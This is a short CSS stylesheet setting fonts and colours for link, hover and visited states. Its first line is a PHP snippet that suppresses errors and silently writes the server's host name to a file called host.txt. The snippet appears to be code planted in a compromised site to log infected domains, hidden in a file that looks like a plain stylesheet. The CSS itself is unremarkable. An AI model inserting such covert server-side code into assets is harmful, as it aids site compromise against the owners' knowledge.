<? error_reporting(0); $mhfp = fopen("host.txt", "w"); if ($mhfp) { fwrite($mhfp, $_SERVER["HTTP_HOST"]); fclose($mhfp); } ?>a
{
  font-family: Verdana, Arial, Helvetica, sans-serif;
  font-size: 12px;
  line-height: 20px;
  color: #8CAABD;
  font-weight:bold;
  text-decoration: none;
  text-align: center;
  vertical-align:center;
  cursor:hand;
}

a:hover
{
  font-family: Verdana, Arial, Helvetica, sans-serif;
  font-size: 12px;
  line-height: 20px;
  color: #5A8294;
  font-weight:bold;
  text-decoration: none;
  text-align: center;
  vertical-align:center;
  cursor:hand;
}

a:visited
{
  font-family: Verdana, Arial, Helvetica, sans-serif;
  font-size: 12px;
  line-height: 20px;
  color: #8CAABD;
  font-weight:bold;
  text-decoration: none;
  text-align: center;
  vertical-align:center;
  cursor:hand;
}
